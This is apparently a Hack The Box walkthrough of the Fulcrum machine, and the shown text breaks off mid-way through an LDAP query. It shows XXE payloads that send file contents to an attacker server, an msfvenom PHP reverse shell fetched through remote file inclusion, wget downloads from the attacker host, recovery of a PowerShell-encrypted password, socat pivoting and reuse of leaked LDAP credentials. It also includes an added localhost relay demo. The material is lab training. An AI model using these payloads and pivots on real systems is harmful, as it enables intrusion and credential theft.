The following blog post is a good read on exploiting XXE vulerbilities. xxe test payload &amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&amp;gt; &amp;lt;!DOCTYPE data SYSTEM &quot;http://10.10.14.19:3434/&quot; [ &amp;lt;!ELEMENT data (#PCDATA)&amp;gt; ]&amp;gt; &amp;lt;data&amp;gt;4&amp;lt;/data&amp;gt; response root@dastinia:~/htb/fulcrum# ncat -lnkvp 3434 Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Listening on :::3434 Ncat: Listening on 0.0.0.0:3434 Ncat: Connection from 10.10.10.62. Ncat: Connection from 10.10.10.62:53288. GET /test-t HTTP/1.0 Host: 10.10.14.19:3434 Connection: close So we now we know what the vulnerability is, and we have a working “proof of concept”. We can safely say that this is going to be the entry point into the box so now it’s time to dive deeper. Exploitation Using Blind XXE to Read Source Code Files Honestly, this part fucking sucked for me. For some reason I’m awful at either following instructions, or there was something else going on. But one thing’s for sure, I clearly didn’t know how XXE properly which made the following section take forever. I used a combination of the following resources, finally put together a stable formula for performing the OOB XXE. I’m not 100% if it was intended, but using the php://filter pretty much was a requirement to pull data out through XXE (no other methods seemed to work). If you are just interested in getting the shell, it’s safe to skip this section. I recommend reading the following resources to understand the different ways we can take advantage of an XXE vulnerability. 
Links: | 1 | 2 | | 3 Contents of test.dtd root@dastinia:~/htb/fulcrum/serve# cat test.dtd &amp;lt;!ENTITY % payl SYSTEM &quot;php://filter/read=convert.base64-encode/resource=file:///etc/issue&quot;&amp;gt; &amp;lt;!ENTITY % intern &quot;&amp;lt;!ENTITY &amp;amp;#37; xxe SYSTEM 'http://10.10.14.128/result?%payl;'&amp;gt;&quot;&amp;gt; Upon successful exploitation, we should be receiving the contents of /etc/issue as a base64 encoded string. root@dastinia:~/htb/fulcrum/serve# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.62 - - [20/Jun/2018 21:46:50] &quot;GET /test.dtd HTTP/1.0&quot; 200 - 10.10.10.62 - - [20/Jun/2018 21:46:50] code 404, message File not found 10.10.10.62 - - [20/Jun/2018 21:46:50] &quot;GET /result?Q3JlYXRlZCBieTogQE9uZUxvZ2ljYWxNeXRoCklQIEFkZHJlc3M6IFw0e2VuczMyfQpIb3N0bmFtZTogICBcbgoKR29vZCBMdWNrIQoKCg== HTTP/1.0&quot; 404 - Decoding it gives us the following content. $ echo -n &quot;Q3JlYXRlZCBieTogQE9uZUxvZ2ljYWxNeXRoCklQIEFkZHJlc3M6IFw0e2VuczMyfQpIb3N0bmFtZTogICBcbgoKR29vZCBMdWNrIQoKCg==&quot; | base64 -d Created by: @OneLogicalMyth IP Address: \4{ens32} Hostname: \n Good Luck! By changing the file in test.dtd we can exfiltrate sensitive files, for further analysis, for example the contents of /etc/passwd or the fulcrum api source code. root:x:0:0:root:/root:/bin/bash ....[snip].... 
messagebus:x:108:111::/var/run/dbus:/bin/false blueprint:x:1000:1000:blueprint,,,:/home/blueprint:/bin/bash colord:x:109:117:colord colour management daemon,,,:/var/lib/colord:/bin/false libvirt-qemu:x:64055:115:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false libvirt-dnsmasq:x:110:118:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin Fulcrum API Source Code &amp;lt;?php header('Content-Type:application/json;charset=utf-8'); header('Server: Fulcrum-API Beta'); libxml_disable_entity_loader (false); $xmlfile = file_get_contents('php://input'); $dom = new DOMDocument(); $dom-&amp;gt;loadXML($xmlfile,LIBXML_NOENT|LIBXML_DTDLOAD); $input = simplexml_import_dom($dom); $output = $input-&amp;gt;Ping; //check if ok if($output == &quot;Ping&quot;) { $data = array('Heartbeat' =&amp;gt; array('Ping' =&amp;gt; &quot;Ping&quot;)); }else{ $data = array('Heartbeat' =&amp;gt; array('Ping' =&amp;gt; &quot;Pong&quot;)); } echo json_encode($data); ?&amp;gt; From our further enumeration we know that there are other applications running on this box with known file names (results from enumerating the fulcrum web service on port 4). Attempting to access one of the known files like home.php ends with nothing being returned, so likely what this means that the other web apps are separated into different directories. Attempting common web directories like www, html, web, upload, uploads you discover that there is web-content being served from the uploads directory which so happens to be the content of the Fulcrum web application service being hosted on port 4. 
dtd payload for discovering content in uploads web directory root@dastinia:~/htb/fulcrum/serve# cat test.dtd &amp;lt;!ENTITY % payl SYSTEM &quot;php://filter/read=convert.base64-encode/resource=../uploads/index.php&quot;&amp;gt; &amp;lt;!ENTITY % intern &quot;&amp;lt;!ENTITY &amp;amp;#37; xxe SYSTEM 'http://10.10.14.128/result?%payl;'&amp;gt;&quot;&amp;gt; results 10.10.10.62 - - [20/Jun/2018 22:32:34] &quot;GET /result?PD9waHAKaWYoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gIT0gIjEyNy4wLjAuMSIpCnsKCWVjaG8gIjxoMT5VbmRlciBNYWludGFuY2U8L2gxPjxwPlBsZWFzZSA8YSBocmVmPVwiaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX0FERFInXSAuICI6NC9pbmRleC5waHA/cGFnZT1ob21lXCI+dHJ5IGFnYWluPC9hPiBsYXRlci48L3A+IjsKfWVsc2V7CgkkaW5jID0gJF9SRVFVRVNUWyJwYWdlIl07CglpbmNsdWRlKCRpbmMuIi5waHAiKTsKfQo/PgoK HTTP/1.0&quot; 404 - Un-Base64’ing the response gives you the contents of index.php &amp;lt;?php if($_SERVER['REMOTE_ADDR'] != &quot;127.0.0.1&quot;) { echo &quot;&amp;lt;h1&amp;gt;Under Maintance&amp;lt;/h1&amp;gt;&amp;lt;p&amp;gt;Please &amp;lt;a href=\&quot;http://&quot; . $_SERVER['SERVER_ADDR'] . 
&quot;:4/index.php?page=home\&quot;&amp;gt;try again&amp;lt;/a&amp;gt; later.&amp;lt;/p&amp;gt;&quot;; }else{ $inc = $_REQUEST[&quot;page&quot;]; include($inc.&quot;.php&quot;); } ?&amp;gt; Contents of home.php &amp;lt;?php ?&amp;gt; &amp;lt;!DOCTYPE html&amp;gt; &amp;lt;html&amp;gt; &amp;lt;body&amp;gt; &amp;lt;h1&amp;gt;Fulcrum File Upload&amp;lt;/h1&amp;gt; &amp;lt;form action=&quot;upload.php&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&amp;gt; Select image to upload: &amp;lt;p&amp;gt;&amp;lt;input type=&quot;file&quot; name=&quot;fileToUpload&quot; id=&quot;fileToUpload&quot;&amp;gt;&amp;lt;/p&amp;gt; &amp;lt;p&amp;gt;&amp;lt;input type=&quot;submit&quot; value=&quot;Upload Image&quot; name=&quot;submit&quot;&amp;gt;&amp;lt;/p&amp;gt; &amp;lt;/form&amp;gt; &amp;lt;/body&amp;gt; &amp;lt;/html&amp;gt; Contents of upload.php &amp;lt;?php if(isset($_POST)) { sleep(2); echo &quot;&amp;lt;p style=\&quot;color:red;\&quot;&amp;gt;Sorry the file upload failed&amp;lt;/p&amp;gt;&quot;; } ?&amp;gt; We can quickly see see that the code in index.php is vulnerable to a textbook php file inclusion vulnerability. The only thing is, to exploit this vulnerability we need to have the request come from the machines localhost. If you attempt to access the page not from localhost it will give you the Under maintenance page. But if the request comes from localhost we hit the 2nd code path of the application, and we have control over the page parameter which is getting passed directly into the include statement which we can use to get code execution. Additional Reading Getting Shell via Remote File Include For what it was worth, getting a shell was relatively simple to execute. You probably could have skipped all of the stuff in the middle section, and gone straight here if you are familiar with php web application vulnerabilities, and what they look like. I believe a lot of people who completed this box did just that. 
generating a regular msfvenom php reverse shell root@dastinia:~/htb/fulcrum/serve# msfvenom -p php/reverse_php LHOST=10.10.15.74 LPORT=443 -f raw &amp;gt; 443.php No platform was selected, choosing Msf::Module::Platform::PHP from the payload No Arch selected, selecting Arch: php from the payload No encoder or badchars specified, outputting raw payload Payload size: 3036 bytes You are going to need to serve your payload with some sort of webserver. A python3 http.server is a quick way to throw up a webserver to host content. setting up python http.server root@dastinia:~/htb/fulcrum/serve# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... Setting up metasploit multi handler to catch shell msf &amp;gt; use exploit/multi/handler msf exploit(multi/handler) &amp;gt; set PAYLOAD php/reverse_php PAYLOAD =&amp;gt; php/reverse_php msf exploit(multi/handler) &amp;gt; set LHOST tun0 LHOST =&amp;gt; tun0 msf exploit(multi/handler) &amp;gt; set LPORT 443 LPORT =&amp;gt; 443 msf exploit(multi/handler) &amp;gt; set ExitOnSession False ExitOnSession =&amp;gt; false msf exploit(multi/handler) &amp;gt; exploit -j -z [*] Exploit running as background job 0. [*] Started reverse TCP handler on 10.10.15.74:443 Now all we need to do is to use our XXE vulnerability to craft a URL to fetch our payload to exploit the file include. 
raw request in burpsuite for exploiting the XXE to php file-include GET / HTTP/1.1 Host: 10.10.10.62:56423 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: pmaCookieVer=5; pma_lang=en; pma_collation_connection=utf8mb4_unicode_ci Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 131 &amp;lt;!DOCTYPE root [ &amp;lt;!ENTITY % remote SYSTEM &quot;http://127.0.0.1:4/index.php?page=http://10.10.15.74/443&quot;&amp;gt; %remote; %intern; %xxe; ]&amp;gt; Sweet got a shell, but getting a shell is only the beginning… getting a shell after successful exploitation msf exploit(multi/handler) &amp;gt; [*] Command shell session 1 opened (10.10.15.74:443 -&amp;gt; 10.10.10.62:47692) at 2018-06-21 22:09:31 -0400 msf exploit(multi/handler) &amp;gt; sessions -i 1 [*] Starting interaction with 1... id uid=33(www-data) gid=33(www-data) groups=33(www-data) pwd /var/www/uploads ls -la total 24 drwxr-xr-x 2 root root 4096 Oct 5 2017 . drwxr-xr-x 6 root root 4096 Oct 5 2017 .. -rw-r--r-- 1 root root 714 Oct 4 2017 Fulcrum_Upload_to_Corp.ps1 -rw-r--r-- 1 root root 321 Oct 4 2017 home.php -rw-r--r-- 1 root root 255 Oct 5 2017 index.php -rw-r--r-- 1 root root 113 Oct 4 2017 upload.php This shell is extremely unstable &amp;amp; will die after a few minutes, so I recommend throwing yourself a regular socat/netcat shell. Pivoting Decrypting/Recovering Credentials in Script for PSRemoting Interestly we discover that there is a powershell script on the box, this is pretty unusual because this machine is labelled as a Linux system. 
Contents of Fulcrum_Upload_to_Corp.ps1 # TODO: Forward the PowerShell remoting port to the external interface # Password is now encrypted \o/ $1 = 'WebUser' $2 = '77,52,110,103,63,109,63,110,116,80,97,53,53,77,52,110,103,63,109,63,110,116,80,97,53,53,48,48,48,48,48,48' -split ',' $3 = '76492d1116743f0423413b16050a5345MgB8AEQAVABpAHoAWgBvAFUALwBXAHEAcABKAFoAQQBNAGEARgArAGYAVgBGAGcAPQA9AHwAOQAwADgANwAxADIAZgA1ADgANwBiADIAYQBjADgAZQAzAGYAOQBkADgANQAzADcAMQA3AGYAOQBhADMAZQAxAGQAYwA2AGIANQA3ADUAYQA1ADUAMwA2ADgAMgBmADUAZgA3AGQAMwA4AGQAOAA2ADIAMgAzAGIAYgAxADMANAA=' $4 = $3 | ConvertTo-SecureString -key $2 $5 = New-Object System.Management.Automation.PSCredential ($1, $4) Invoke-Command -Computer upload.fulcrum.local -Credential $5 -File Data.ps1 We can modify the script slightly so that it decrypts the password for us. decrypt.ps1 $1 = 'WebUser' $2 = '77,52,110,103,63,109,63,110,116,80,97,53,53,77,52,110,103,63,109,63,110,116,80,97,53,53,48,48,48,48,48,48' -split ',' $3 = '76492d1116743f0423413b16050a5345MgB8AEQAVABpAHoAWgBvAFUALwBXAHEAcABKAFoAQQBNAGEARgArAGYAVgBGAGcAPQA9AHwAOQAwADgANwAxADIAZgA1ADgANwBiADIAYQBjADgAZQAzAGYAOQBkADgANQAzADcAMQA3AGYAOQBhADMAZQAxAGQAYwA2AGIANQA3ADUAYQA1ADUAMwA2ADgAMgBmADUAZgA3AGQAMwA4AGQAOAA2ADIAMgAzAGIAYgAxADMANAA=' $4 = $3 | ConvertTo-SecureString -key $2 [System.Runtime.InteropServices.marshal]::PtrToStringAuto([System.Runtime.InteropServices.marshal]::SecureStringToBSTR($4)) Password of WebUser PS C:\&amp;gt; .\decrypt.ps1 M4ng£m£ntPa55 PS C:\&amp;gt; Discovering 192.168.122.x Network After decrypting the password, the next step was to search for additional containers, virtual machines, or connected networks. Running an ifconfig we see this machine has many interfaces, which is extremely usual for a Hack the Box machine. A network address that stands our is 192.168.122.1 which is very strange. Likely this machine is dual-homed. 
ifconfig output www-data@Fulcrum:~$ ifconfig corp Link encap:Ethernet HWaddr 52:54:00:87:ee:c0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:412 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:32601 (32.6 KB) TX bytes:0 (0.0 B) ens32 Link encap:Ethernet HWaddr 00:50:56:b9:44:f1 inet addr:10.10.10.62 Bcast:10.10.10.255 Mask:255.255.255.0 inet6 addr: dead:beef::250:56ff:feb9:44f1/64 Scope:Global inet6 addr: fe80::250:56ff:feb9:44f1/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:72492 errors:0 dropped:82 overruns:0 frame:0 TX packets:35844 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:11175820 (11.1 MB) TX bytes:5982295 (5.9 MB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:241 errors:0 dropped:0 overruns:0 frame:0 TX packets:241 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:18409 (18.4 KB) TX bytes:18409 (18.4 KB) virbr0 Link encap:Ethernet HWaddr 52:54:00:9c:e7:10 inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:53053 errors:0 dropped:0 overruns:0 frame:0 TX packets:50375 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:3317157 (3.3 MB) TX bytes:2463028 (2.4 MB) vnet0 Link encap:Ethernet HWaddr fe:54:00:32:d7:13 inet6 addr: fe80::fc54:ff:fe32:d713/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:4904 errors:0 dropped:0 overruns:0 frame:0 TX packets:16218 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:493632 (493.6 KB) TX bytes:1118993 (1.1 MB) vnet1 Link encap:Ethernet HWaddr fe:54:00:74:9d:17 inet6 addr: fe80::fc54:ff:fe74:9d17/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:53053 errors:0 dropped:0 
overruns:0 frame:0 TX packets:61628 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:4059899 (4.0 MB) TX bytes:3048416 (3.0 MB)
vnet2 Link encap:Ethernet HWaddr fe:54:00:32:59:e0 inet6 addr: fe80::fc54:ff:fe32:59e0/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:6321 errors:0 dropped:0 overruns:0 frame:0 TX packets:18278 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:599472 (599.4 KB) TX bytes:2537511 (2.5 MB)
vnet3 Link encap:Ethernet HWaddr fe:54:00:82:69:f5 inet6 addr: fe80::fc54:ff:fe82:69f5/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:3146 errors:0 dropped:0 overruns:0 frame:0 TX packets:15213 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:244122 (244.1 KB) TX bytes:915975 (915.9 KB)
vnet4 Link encap:Ethernet HWaddr fe:54:00:01:c6:b8 inet6 addr: fe80::fc54:ff:fe01:c6b8/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:7031 errors:0 dropped:0 overruns:0 frame:0 TX packets:17564 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1952435 (1.9 MB) TX bytes:1184340 (1.1 MB)
vnet5 Link encap:Ethernet HWaddr fe:54:00:8f:b9:f9 inet6 addr: fe80::fc54:ff:fe8f:b9f9/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1821 errors:0 dropped:0 overruns:0 frame:0 TX packets:12593 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:289587 (289.5 KB) TX bytes:785970 (785.9 KB)
web Link encap:Ethernet HWaddr 52:54:00:15:08:7e UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:583 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:65505 (65.5 KB) TX bytes:0 (0.0 B)

To reduce our scope a bit, we can check the ARP table and see which machines this machine has talked to recently.

www-data@Fulcrum:~$ arp -a
? (10.10.10.2) at 00:50:56:aa:9c:8d [ether] on ens32
? (192.168.122.228) at 52:54:00:74:9d:17 [ether] on virbr0

We see that there is a live host at 192.168.122.228. Our next step was to discover what ports were open on this machine. There are many ways to scan a machine when you are on someone’s internal network, but I prefer to drop a statically compiled version of nmap (and its associated data files) if I have the ability to do so. It saves time, and I want to feel at home when I’m on someone’s box.

www-data@Fulcrum:/tmp/.scan$ wget http://10.10.15.74:6666/nmap.tar.gz
--2018-06-22 03:30:11-- http://10.10.15.74:6666/nmap.tar.gz
Connecting to 10.10.15.74:6666... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4875842 (4.6M) [application/gzip]
Saving to: 'nmap.tar.gz'
nmap.tar.gz 100%[===================&amp;gt;] 4.65M 1.04MB/s in 6.8s
2018-06-22 03:30:19 (705 KB/s) - 'nmap.tar.gz' saved [4875842/4875842]
www-data@Fulcrum:/tmp/.scan$ clear
TERM environment variable not set.
www-data@Fulcrum:/tmp/.scan$ ls
nmap.tar.gz
www-data@Fulcrum:/tmp/.scan$ tar -xvf nmap.tar.gz
...[snip]...

Downloading our statically compiled nmap:

www-data@Fulcrum:/tmp/.scan$ wget http://10.10.15.74:6666/nmapstatic
--2018-06-22 03:36:28-- http://10.10.15.74:6666/nmapstatic
Connecting to 10.10.15.74:6666... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5944464 (5.7M) [application/octet-stream]
Saving to: 'nmapstatic'
nmapstatic 100%[===================&amp;gt;] 5.67M 576KB/s in 11s
2018-06-22 03:36:40 (506 KB/s) - 'nmapstatic' saved [5944464/5944464]

To scan with our statically compiled nmap, we use the --datadir option to point it at the extracted data files; with this we can port scan just as easily as if we were doing it from our own box.

www-data@Fulcrum:/tmp/.scan$ ./nmapstatic --datadir nmap/ -p- 192.168.122.228
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2018-06-22 03:39 BST
Nmap scan report for 192.168.122.228
Host is up (0.0022s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
5986/tcp open wsmans
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 165.06 seconds

Like we thought, there seems to be a Windows host attached with PowerShell Remoting enabled.

Pivoting from Fulcrum Host to 192.168.122.x Network

To use PSRemoting from my host machine properly, we are going to need to set up a pivot. The general gist of what we need to accomplish can be expressed with this diagram. I’m going to use socat for the majority of this because it’s a tool I am very familiar with, and it’s pretty easy to use, although you can achieve the same results using Metasploit, ssh, or some other like-minded tool. We are going to listen for connections on port 55555 -&amp;gt; and relay that connection to 192.168.122.228 on port 5986 (the PSRemoting port).

On the Fulcrum machine (10.10.10.62):

www-data@Fulcrum:/tmp/ ./socat tcp-listen:55555,reuseaddr,fork tcp:192.168.122.228:5986

On my Kali box (192.168.30.130), this listens for connections on port 5986 -&amp;gt; and relays that connection to 10.10.10.62 on port 55555:

root@dastinia:~# socat tcp-listen:5986,reuseaddr,fork tcp:10.10.10.62:55555

Now from my (local) Windows 10 host we can connect to my Kali host (192.168.30.130), and it will relay that connection through our pivots to the network we are attempting to reach. We need the additional -SessionOption values SkipCACheck and SkipCNCheck because otherwise you get two error messages stating that The SSL certificate is signed by an unknown certificate authority. &amp;amp; The SSL certificate contains a common name (CN) that does not match the hostname.
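The two socat commands above form a chained relay. As an added example (not part of the original write-up), here is the same two-hop forwarder in Python, run entirely on 127.0.0.1 against a stand-in for the PSRemoting host that echoes back the peer address it sees; hosts and ports are constructed. The point it shows is that the final host only ever sees the last hop as its peer, which is what its logs will record.

```python
"""Two-hop TCP relay, the Python equivalent of the two socat commands (added example)."""
import socket
import threading


def _pump(src, dst):
    """Copy bytes from src to dst until src reaches EOF, then close dst's write side."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_relay(listen_port, target):
    """Listen on 127.0.0.1:listen_port and forward every client to target (host, port).

    Mirrors 'socat tcp-listen:PORT,reuseaddr,fork tcp:HOST:PORT'. Port 0 picks a free port.
    Returns (bound_port, stop_event).
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # socat's reuseaddr
    srv.bind(("127.0.0.1", listen_port))
    srv.listen(16)
    srv.settimeout(0.2)  # lets the accept loop notice the stop event
    stop = threading.Event()

    def accept_loop():
        while not stop.is_set():
            try:
                client, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            upstream = socket.create_connection(target)  # socat's fork: one upstream per client
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()
        srv.close()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1], stop


def start_peer_echo_server():
    """Stand-in for the PSRemoting host: replies with the peer address it saw plus the request."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def serve():
        while True:
            try:
                conn, peer = srv.accept()
            except OSError:
                break
            with conn:
                data = conn.recv(4096)
                conn.sendall(f"{peer[0]}:{peer[1]} saw: ".encode() + data)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], srv


def run_chain_demo(payload=b"hello through the pivot"):
    """Client -> hop1 ('kali') -> hop2 ('fulcrum') -> target; returns what each side observed."""
    target_port, target_srv = start_peer_echo_server()
    hop2_port, stop2 = start_relay(0, ("127.0.0.1", target_port))  # fulcrum: 55555 -> 192.168.122.228:5986
    hop1_port, stop1 = start_relay(0, ("127.0.0.1", hop2_port))    # kali: 5986 -> 10.10.10.62:55555
    with socket.create_connection(("127.0.0.1", hop1_port)) as client:
        client_port = client.getsockname()[1]
        client.sendall(payload)
        client.shutdown(socket.SHUT_WR)
        reply = b""
        while True:
            chunk = client.recv(4096)
            if not chunk:
                break
            reply += chunk
    stop1.set()
    stop2.set()
    target_srv.close()
    seen_host, seen_port = reply.split(b" saw: ", 1)[0].decode().rsplit(":", 1)
    return {
        "reply": reply,
        "client_port": client_port,
        "target_saw_host": seen_host,
        "target_saw_port": int(seen_port),  # hop2's outbound socket, not the client's
        "payload_echoed": reply.endswith(payload),
    }


if __name__ == "__main__":
    print(run_chain_demo())
```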
PS C:\&amp;gt; Enter-PSSession -Computername 192.168.30.130 -Credential &quot;Webuser&quot; -UseSSL -SessionOption (New-PSSessionOption -SkipCACheck -SkipCNCheck)
[192.168.30.130]: PS C:\Users\WebUser\Documents&amp;gt; $env:UserName
WebUser
[192.168.30.130]: PS C:\Users\WebUser\Documents&amp;gt; $env:UserDomain
WEBSERVER

Pivoting from WebServer to FileServer

If you attempt to read the contents of the user flag, you get a message stating You need to go deeper!. Inspecting the CheckFileServer.ps1 PowerShell script, we can see that it hints that there is most likely another host on the network.

[192.168.30.130]: PS C:\Users\WebUser\Documents&amp;gt; dir
Directory: C:\Users\WebUser\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/2/2017 8:39 PM 260 CheckFileServer.ps1
-a---- 10/12/2017 4:23 AM 33266 Invoke-PsExec.ps1
-a---- 10/2/2017 8:23 PM 24 user.txt
[192.168.30.130]: PS C:\Users\WebUser\Documents&amp;gt; type .\user.txt
You need to go deeper!
[192.168.30.130]: PS C:\Users\WebUser\Documents&amp;gt; type .\CheckFileServer.ps1
$Server = '127.0.0.1' # Waiting on IT to give me the address...
$Creds = Get-Credential -Message 'Please enter file server credentials'
Get-CimClass -ClassName win32_operatingsystem -ComputerName $Server -Credential $Creds # TODO: can't get this to work

Since the hostname of this system is “WebServer”, we should probably inspect the contents of the webroot… Inspecting the contents of the web.config, we find credentials which look like they will allow us to run LDAP queries.

[192.168.30.130]: PS C:\inetpub\wwwroot&amp;gt; dir
Directory: C:\inetpub\wwwroot
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/2/2017 8:09 PM 5359 index.htm
-a---- 10/2/2017 8:11 PM 1310 web.config
[192.168.30.130]: PS C:\inetpub\wwwroot&amp;gt; type web.config
&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&amp;gt;
&amp;lt;configuration xmlns=&quot;http://schemas.microsoft.com/.NetConfiguration/v2.0&quot;&amp;gt;
&amp;lt;appSettings /&amp;gt;
&amp;lt;connectionStrings&amp;gt;
&amp;lt;add connectionString=&quot;LDAP://dc.fulcrum.local/OU=People,DC=fulcrum,DC=local&quot; name=&quot;ADServices&quot; /&amp;gt;
&amp;lt;/connectionStrings&amp;gt;
&amp;lt;system.web&amp;gt;
&amp;lt;membership defaultProvider=&quot;ADProvider&quot;&amp;gt;
&amp;lt;providers&amp;gt;
&amp;lt;add name=&quot;ADProvider&quot; type=&quot;System.Web.Security.ActiveDirectoryMembershipProvider, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a&quot; connectionStringName=&quot;ADConnString&quot; connectionUsername=&quot;FULCRUM\LDAP&quot; connectionPassword=&quot;PasswordForSearching123!&quot; attributeMapUsername=&quot;SAMAccountName&quot; /&amp;gt;
&amp;lt;/providers&amp;gt;
&amp;lt;/membership&amp;gt;
&amp;lt;/system.web&amp;gt;
...[snip]...
[192.168.30.130]: PS C:\inetpub\wwwroot&amp;gt;

Querying LDAP for Information

At the time, I didn’t bother writing proper LDAP queries, so I did the inelegant thing of running one query that matched absolutely every object and manually inspecting the results for interesting information.

Querying LDAP in PowerShell:

$username = 'LDAP'
$password = 'PasswordForSearching123!'
$DomainControllerIpAddress = 'dc.fulcrum.local'
$LdapDn = 'dc=fulcrum,dc=local'
$dn = New-Object System.DirectoryServices.DirectoryEntry (&quot;LDAP://$($DomainControllerIpAddress):389/$LdapDn&quot;,$username,$password)
$ds = new-object System.DirectoryServices.DirectorySearcher($dn)
$ds.filter = &quot;((ObjectClass=*))&quot;
$ds.SearchScope = &quot;subtree&quot;
$ds.PropertiesToLoad.Add(&quot;distinguishedName&quot;)
$ds.PropertiesToLoad.Add(&quot;sAMAccountName&quot;)
$ds.PropertiesToLoad.Add(&quot;lastLogon&quot;)
$ds.PropertiesToLoad.Add(&quot;memberOf&quot;)
$ds.PropertiesToLoad.Add(&quot;distinguishedname&quot;)
$ds.FindAll()

Output:

...[snip]...
LDAP://dc.fulcrum.local:389/CN=FILE,CN=Computers,DC=fulcrum,DC=local {distinguishedname, samaccountname, adspath, lastlogon}
LDAP://dc.fulcrum.local:389/CN=Bobby Tables,OU=People,DC=fulcrum,DC=local {distinguishedname, samaccountname, adspath, lastlogon}
LDAP://dc.fulcrum.local:389/OU=People,DC=fulcrum,DC=local {distinguishedname, adspath}
LDAP://dc.fulcrum.local:389/CN=LDAP Lookup,OU=People,DC=fulcrum,DC=local {distinguishedname, samaccountname, adspath, lastlogon}
LDAP://dc.fulcrum.local:389/CN=be36,OU=People,DC=fulcrum,DC=local {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=8631,OU=People,DC=fulcrum,DC=local {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=9791,OU=People,DC=fulcrum,DC=local {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=879f,OU=People,DC=fulcrum,DC=local {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=953d,OU=People,DC=fulcrum,DC=local {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=81b2,OU=People,DC=fulcrum,DC=local {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=97f0,OU=People,DC=fulcrum,DC=local {memberof, distinguishedname, samaccountname, adspath...}

From the output of our LDAP query we can see some interesting objects, including the name of the file server, file.fulcrum.local, and a user whose name differs from the rest of the users: “Bobby Tables”. We can run a more filtered query on the common name (CN) “bobby”, this time loading all the properties mapped to this object.

$username = 'LDAP'
$password = 'PasswordForSearching123!'
$DomainControllerIpAddress = 'dc.fulcrum.local'
$LdapDn = 'dc=fulcrum,dc=local'
